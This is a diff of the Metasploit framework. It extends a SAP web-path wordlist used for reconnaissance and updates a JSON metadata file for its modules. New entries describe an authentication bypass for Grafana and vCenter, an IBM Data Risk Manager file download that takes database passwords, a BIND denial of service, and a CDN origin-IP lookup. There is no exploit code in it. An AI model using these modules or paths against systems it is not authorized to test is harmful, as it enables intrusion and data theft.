+/sap/public/bc/sec/oauth2/client/redirect
+/sap/public/bc/sec/saml2
+/sap/public/bc/sicf_login_run
+/sap/public/bc/themes
+/sap/public/bc/tmp_wd_mimes
+/sap/public/bc/trex
+/sap/public/bc/ui2
+/sap/public/bc/ui5_ui5
+/sap/public/bc/ui5_ui5/ILMRWC
+/sap/public/bc/uics
+/sap/public/bc/uics/whitelist
+/sap/public/bc/ur
+/sap/public/bc/wdtracetool
+/sap/public/bc/webdynpro
+/sap/public/bc/webdynpro/adobechallenge
+/sap/public/bc/webdynpro/adobeChallenge
+/sap/public/bc/webdynpro/mimes
+/sap/public/bc/webdynpro/Polling
+/sap/public/bc/webdynpro/ssr
+/sap/public/bc/webdynpro/viewdesigner
+/sap/public/bc/webdynpro/ViewDesigner
+/sap/public/bc/webicons
+/sap/public/bc/workflow
+/sap/public/bc/workflow/shortcut
+/sap/public/bsp
+/sap/public/bsp/sap
+/sap/public/bsp/sap/htmlb
+/sap/public/bsp/sap/public
+/sap/public/bsp/sap/public/bc
+/sap/public/bsp/sap/public/faa
+/sap/public/bsp/sap/public/FAA
+/sap/public/bsp/sap/public/graphics
+/sap/public/bsp/sap/public/graphics/jnet_handler
+/sap/public/bsp/sap/public/graphics/mimes
+/sap/public/bsp/sap/public/ISE
+/sap/public/bsp/sap/public/SEM
+/sap/public/bsp/sap/system
+/sap/public/bsp/sap/system_public
+/sap/public/BusinessSuite
+/sap/public/BusinessSuite/BCV
+/sap/public/BusinessSuite/BSSP
+/sap/public/BusinessSuite/CBESH_ICONS
+/sap/public/BusinessSuite/CloCo
+/sap/public/BusinessSuite/TM
+/sap/public/BusinessSuite/TM/FlashIslands
+/sap/public/BusinessSuite/TM/Icons
+/sap/public/BusinessSuite/TM/Icons_rtl
+/sap/public/E2EALERT
+/sap/public/ES
+/sap/public/HRPDV
+/sap/public/HRPDV/Icons
+/sap/public/HRRenewal
+/sap/public/HRRenewal/PB
+/sap/public/icf_check
+/sap/public/icf_info
+/sap/public/icf_info/icr_groups
+/sap/public/icf_info/icr_urlprefix
+/sap/public/icf_info/logon_groups
+/sap/public/icf_info/urlprefix
+/sap/public/icman
+/sap/public/icman/ping
+/sap/public/info
+/sap/public/LSOFE
+/sap/public/LSOFE/IconLarge
+/sap/public/LSOFE/IconLarge/CORBU
+/sap/public/LSOFE/IconLarge/TRADESHOW
+/sap/public/LSOFE/Pictogram
+/sap/public/LSOFE/Pictogram/CORBU
+/sap/public/LSOFE/Pictogram/TRADESHOW
+/sap/public/myssocntl
+/sap/public/opu
+/sap/public/opu/resources
+/sap/public/ping
+/sap/public/PPM
+/sap/public/PPM/PFM
+/sap/public/PPM/PFM/BCV
+/sap/public/PPM/PFM/UI
+/sap/public/PPM/PRO
+/sap/wdisp/admin
+/sap/wdvd
+/sap/webcuif
+/sap/webdynpro/sap/hap_main_document
+/sap/webdynpro/sap/hap_start_page_powl_ui_ess
+/sap/webdynpro/sap/hap_store_page_powl_ui_mss
+/sap/webdynpro/sap/hrtmc_employee_profile
+/sap/webdynpro/sap/hrtmc_rm_maintenance
+/sap/webdynpro/sap/hrtmc_ta_assessment
+/sap/webdynpro/sap/hrtmc_ta_dashboard
+/sap/webdynpro/sap/wd_analyze_config_user
+/scripts/wgate
+/servlet/com.sap.admin.Critical.Actio
+/sim/
+/sim/config/testdata.jsp
+/sim/config/testerror.jsp
+/sim/index.html
+/SLDStart/plain
+/SLDStart/secure
+/socoview
+/socoview/flddisplay.asp
+/SQLtrace/index.html
+/sysconfig
+/tc/lm/webadmin/clusteradmin
+/tc.lm.webadmin.endtoend.public.app
+/teched/test
+/TestJDBC_Web
+/TOdbo
+/top.html
+/TSapq
+/TXmla
+/uddi/
+/uddiclient
+/uddiclient/jsps/index.jsp
+/uddiclient/process/
+/useradmin
+/userhome
+/utl/UsageTypesInfo
+/VC
+/vscantest/
+/webdynpro/dispatcher
+/webdynpro/dispatcher/
+/webdynpro/dispatcher/sap.com/grc~accvwdcomp
+/webdynpro/dispatcher/sap.com/grc~aewebquery
+/webdynpro/dispatcher/sap.com/grc~ccappcomp
+/webdynpro/dispatcher/sap.com/grc~ccxsysbe
+/webdynpro/dispatcher/sap.com/grc~ccxsysbehr
+/webdynpro/dispatcher/sap.com/grc~ffappcomp
+/webdynpro/dispatcher/sap.com/pb/pagebuilder
+/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
+/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
+/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
+/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
+/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
+/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
+/webdynpro/dispatcher/sap.com/tc~wd~tools
+/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
+/webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
+/webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
+/webdynpro/resources/sap.com/
+/webdynpro/welcome/Welcome.jsp
+/WSConnector/Config1
+/WSConnector/Config1?wsdl
+/WSConnector/Config?wsdl
+/wsd2wsdl
+/wsnavigator
+/wsnavigator/jsps/index.jsp
+/wsnavigator/jsps/redirect.jsp
+/wsnavigator/jsps/sendrequest.jsp
+/wsnavigator/jsps/test.jsp
+/wssproc/cert
+/wssproc/plain
+/wssproc/ssl

db/modules_metadata_base.json

@@ -79,7 +79,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2020-02-18 08:58:30 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
     "is_install_path": true,
     "ref_name": "admin/android/google_play_store_uxss_xframe_rce",
@@ -295,7 +295,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/backupexec/dump.rb",
     "is_install_path": true,
     "ref_name": "admin/backupexec/dump",
@@ -334,7 +334,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/backupexec/registry.rb",
     "is_install_path": true,
     "ref_name": "admin/backupexec/registry",
@@ -509,7 +509,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb",
     "is_install_path": true,
     "ref_name": "admin/cisco/cisco_asa_extrabacon",
@@ -767,7 +767,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb",
     "is_install_path": true,
     "ref_name": "admin/dns/dyn_dns_update",
@@ -1216,7 +1216,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2020-02-18 08:58:30 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
     "is_install_path": true,
     "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -1712,6 +1712,46 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_admin/http/grafana_auth_bypass": {
+    "name": "Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth",
+    "fullname": "auxiliary/admin/http/grafana_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-08-14",
+    "type": "auxiliary",
+    "author": [
+      "Rene Riedling",
+      "Sebastian Solnica"
+    ],
+    "description": "This module generates a remember me cookie for a valid username. Through unpropper seeding \n        while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. \n        This cookie can be used for bypass authentication for everyone knowing a valid username.",
+    "references": [
+      "CVE-2018-15727",
+      "URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15727",
+      "URL-https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 3000,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-04-20 09:15:58 +0000",
+    "path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py",
+    "is_install_path": true,
+    "ref_name": "admin/http/grafana_auth_bypass",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_admin/http/hp_web_jetadmin_exec": {
     "name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution",
     "fullname": "auxiliary/admin/http/hp_web_jetadmin_exec",
@@ -1760,6 +1800,55 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_admin/http/ibm_drm_download": {
+    "name": "IBM Data Risk Manager Arbitrary File Download",
+    "fullname": "auxiliary/admin/http/ibm_drm_download",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-21",
+    "type": "auxiliary",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by\n          an unauthenticated attacker to download arbitrary files off the system.\n          The first is an unauthenticated bypass, followed by a path traversal.\n          This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.\n          A downloaded file is zipped, and this module also unzips it before storing it in the database.\n          By default this module downloads Tomcat's application.properties files, which contains the\n          database password, amongst other sensitive data.\n          At the time of disclosure, this is a 0 day. Versions 2.0.3 and 2.0.2 are confirmed to be\n          affected, and the latest 2.0.6 is most likely affected too. Version 2.0.1 is not vulnerable.",
+    "references": [
+      "CVE-2020-4427",
+      "CVE-2020-4429",
+      "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md",
+      "URL-https://seclists.org/fulldisclosure/2020/Apr/33"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-05-07 08:03:28 +0000",
+    "path": "/modules/auxiliary/admin/http/ibm_drm_download.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/ibm_drm_download",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_admin/http/iis_auth_bypass": {
     "name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass",
     "fullname": "auxiliary/admin/http/iis_auth_bypass",
@@ -1945,7 +2034,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb",
     "is_install_path": true,
     "ref_name": "admin/http/jboss_bshdeployer",
@@ -1994,7 +2083,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb",
     "is_install_path": true,
     "ref_name": "admin/http/jboss_deploymentfilerepository",
@@ -2682,7 +2771,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2020-02-18 08:58:30 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
     "is_install_path": true,
     "ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -3860,7 +3949,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb",
     "is_install_path": true,
     "ref_name": "admin/http/typo3_sa_2009_002",
@@ -4525,7 +4614,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-09-30 15:03:38 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/juniper/juniper_config.rb",
     "is_install_path": true,
     "ref_name": "admin/juniper/juniper_config",
@@ -4581,6 +4670,54 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_admin/ldap/vmware_vcenter_vmdir_auth_bypass": {
+    "name": "VMware vCenter Server vmdir Authentication Bypass",
+    "fullname": "auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-09",
+    "type": "auxiliary",
+    "author": [
+      "JJ Lehmann",
+      "Ofri Ziv",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n          vmdir service to add an arbitrary administrator user. Version 6.7\n          prior to the 6.7U3f update is vulnerable.",
+    "references": [
+      "CVE-2020-3952",
+      "URL-https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-05-21 21:01:52 +0000",
+    "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_admin/maxdb/maxdb_cons_exec": {
     "name": "SAP MaxDB cons.exe Remote Command Injection",
     "fullname": "auxiliary/admin/maxdb/maxdb_cons_exec",
@@ -6784,7 +6921,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/serverprotect/file.rb",
     "is_install_path": true,
     "ref_name": "admin/serverprotect/file",
@@ -7320,7 +7457,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb",
     "is_install_path": true,
     "ref_name": "admin/tftp/tftp_transfer_util",
@@ -7369,7 +7506,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb",
     "is_install_path": true,
     "ref_name": "admin/tikiwiki/tikidblib",
@@ -7380,6 +7517,43 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_admin/ubiquiti/ubiquiti_config": {
+    "name": "Ubiquiti Configuration Importer",
+    "fullname": "auxiliary/admin/ubiquiti/ubiquiti_config",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports an Ubiquiti device configuration.\n        The db file within the .unf backup is the data file for\n        Unifi. This module can take either the db file or .unf.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-03-21 11:00:25 +0000",
+    "path": "/modules/auxiliary/admin/ubiquiti/ubiquiti_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/ubiquiti/ubiquiti_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_admin/upnp/soap_portmapping": {
     "name": "UPnP IGD SOAP Port Mapping Utility",
     "fullname": "auxiliary/admin/upnp/soap_portmapping",
@@ -7758,7 +7932,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb",
     "is_install_path": true,
     "ref_name": "admin/vxworks/wdbrpc_memory_dump",
@@ -7797,7 +7971,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
     "is_install_path": true,
     "ref_name": "admin/vxworks/wdbrpc_reboot",
@@ -7848,7 +8022,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "admin/webmin/edit_html_fileaccess",
@@ -7898,7 +8072,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/admin/webmin/file_disclosure.rb",
     "is_install_path": true,
     "ref_name": "admin/webmin/file_disclosure",
@@ -8068,7 +8242,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/analyze/crack_aix.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_aix",
@@ -8110,7 +8284,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2020-02-06 10:23:53 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/analyze/crack_databases.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_databases",
@@ -8149,7 +8323,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/analyze/crack_linux.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_linux",
@@ -8186,7 +8360,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-11-17 13:44:19 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/analyze/crack_mobile.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_mobile",
@@ -8223,7 +8397,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-07-15 19:57:39 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/analyze/crack_osx.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_osx",
@@ -8260,7 +8434,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-07-15 19:57:39 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/analyze/crack_webapps.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_webapps",
@@ -8299,7 +8473,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2020-02-06 10:23:53 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/analyze/crack_windows.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_windows",
@@ -8498,7 +8672,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-05 14:40:27 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/client/iec104/iec104.rb",
     "is_install_path": true,
     "ref_name": "client/iec104/iec104",
@@ -8839,7 +9013,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb",
     "is_install_path": true,
     "ref_name": "dos/android/android_stock_browser_iframe",
@@ -9050,7 +9224,7 @@
     "needs_cleanup": false
   },
   "auxiliary_dos/dns/bind_tsig": {
-    "name": "BIND TKEY Query Denial of Service",
+    "name": "BIND TSIG Query Denial of Service",
     "fullname": "auxiliary/dos/dns/bind_tsig",
     "aliases": [
 
@@ -9079,7 +9253,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-08-26 10:41:10 +0000",
+    "mod_time": "2020-05-27 21:46:47 +0000",
     "path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
     "is_install_path": true,
     "ref_name": "dos/dns/bind_tsig",
@@ -9090,6 +9264,46 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_dos/dns/bind_tsig_badtime": {
+    "name": "BIND TSIG Badtime Query Denial of Service",
+    "fullname": "auxiliary/dos/dns/bind_tsig_badtime",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-05-19",
+    "type": "auxiliary",
+    "author": [
+      "Tobias Klein",
+      "Shuto Imai"
+    ],
+    "description": "A logic error in code which checks TSIG validity can be used to\n        trigger an assertion failure in tsig.c.",
+    "references": [
+      "CVE-2020-8617",
+      "URL-https://gitlab.isc.org/isc-projects/bind9/-/issues/1703",
+      "URL-https://www.trapkit.de/advisories/TKADV2020-002.txt"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 53,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-05-27 09:24:47 +0000",
+    "path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb",
+    "is_install_path": true,
+    "ref_name": "dos/dns/bind_tsig_badtime",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_dos/freebsd/nfsd/nfsd_mount": {
     "name": "FreeBSD Remote NFS RPC Request Denial of Service",
     "fullname": "auxiliary/dos/freebsd/nfsd/nfsd_mount",
@@ -9341,7 +9555,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-04-25 23:08:19 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
     "is_install_path": true,
     "ref_name": "dos/http/apache_range_dos",
@@ -9694,7 +9908,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb",
     "is_install_path": true,
     "ref_name": "dos/http/gzip_bomb_dos",
@@ -9792,7 +10006,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-10-09 17:02:24 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb",
     "is_install_path": true,
     "ref_name": "dos/http/ibm_lotus_notes",
@@ -9830,7 +10044,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-11-06 20:45:50 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb",
     "is_install_path": true,
     "ref_name": "dos/http/ibm_lotus_notes2",
@@ -10428,7 +10642,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-06-14 11:25:00 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/http/webkitplus.rb",
     "is_install_path": true,
     "ref_name": "dos/http/webkitplus",
@@ -11910,7 +12124,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb",
     "is_install_path": true,
     "ref_name": "dos/windows/browser/ms09_065_eot_integer",
@@ -12695,7 +12909,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb",
     "is_install_path": true,
     "ref_name": "dos/windows/smb/ms06_035_mailslot",
@@ -13026,7 +13240,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb",
     "is_install_path": true,
     "ref_name": "dos/windows/smb/rras_vls_null_deref",
@@ -14503,7 +14717,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/android_browser_file_theft.rb",
     "is_install_path": true,
     "ref_name": "gather/android_browser_file_theft",
@@ -14542,7 +14756,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb",
     "is_install_path": true,
     "ref_name": "gather/android_browser_new_tab_cookie_theft",
@@ -14750,7 +14964,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb",
     "is_install_path": true,
     "ref_name": "gather/apple_safari_ftp_url_cookie_theft",
@@ -14787,7 +15001,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2020-02-18 08:58:30 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb",
     "is_install_path": true,
     "ref_name": "gather/apple_safari_webarchive_uxss",
@@ -14910,7 +15124,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/browser_info.rb",
     "is_install_path": true,
     "ref_name": "gather/browser_info",
@@ -14950,7 +15164,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-04-11 01:45:41 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/browser_lanipleak.rb",
     "is_install_path": true,
     "ref_name": "gather/browser_lanipleak",
@@ -15304,6 +15518,43 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_gather/cloud_lookup": {
+    "name": "Cloud Lookup (and Bypass)",
+    "fullname": "auxiliary/gather/cloud_lookup",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module can be useful if you need to test the security of your server and your\n          website behind a solution Cloud based. By discovering the origin IP address of the\n          targeted host.\n\n          More precisely, this module uses multiple data sources (in order ViewDNS.info, DNS enumeration\n          and Censys) to collect assigned (or have been assigned) IP addresses from the targeted site or domain\n          that uses the following:\n            * Amazon Cloudflare, Amazon CloudFront, ArvanCloud, Envoy Proxy, Fastly, Stackpath Fireblade,\n              Stackpath MaxCDN, Imperva Incapsula, InGen Security (BinarySec EasyWAF), KeyCDN, Microsoft AzureCDN,\n              Netlify and Sucuri.",
+    "references": [
+      "URL-https://citadelo.com/en/blog/cloudflare-how-to-do-it-right-and-do-not-reveal-your-real-ip/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      53
+    ],
+    "autofilter_services": [
+      "dns"
+    ],
+    "targets": null,
+    "mod_time": "2020-05-08 15:41:19 +0000",
+    "path": "/modules/auxiliary/gather/cloud_lookup.rb",
+    "is_install_path": true,
+    "ref_name": "gather/cloud_lookup",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_gather/coldfusion_pwd_props": {
     "name": "ColdFusion 'password.properties' Hash Extraction",
     "fullname": "auxiliary/gather/coldfusion_pwd_props",
@@ -15318,7 +15569,7 @@
       "sinn3r <sinn3r@metasploit.com>",
       "nebulus"
     ],
-    "description": "This module uses a directory traversal vulnerability to extract information\n        such as password, rdspassword, and \"encrypted\" properties. This module has been\n        tested successfully on ColdFusion 9 and ColdFusion 10. Use actions to select the\n        target ColdFusion version.",
+    "description": "This module uses a directory traversal vulnerability to extract information\n        such as password, rdspassword, and \"encrypted\" properties. This module has been\n        tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).",
     "references": [
       "CVE-2013-3336",
       "OSVDB-93114",
@@ -15343,7 +15594,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/coldfusion_pwd_props.rb",
     "is_install_path": true,
     "ref_name": "gather/coldfusion_pwd_props",
@@ -15785,15 +16036,15 @@
     ],
     "platform": "",
     "arch": "",
-    "rport": null,
+    "rport": 53,
     "autofilter_ports": [
-
+      53
     ],
     "autofilter_services": [
-
+      "dns"
     ],
     "targets": null,
-    "mod_time": "2018-07-15 15:38:56 +0000",
+    "mod_time": "2020-05-06 10:38:11 +0000",
     "path": "/modules/auxiliary/gather/enum_dns.rb",
     "is_install_path": true,
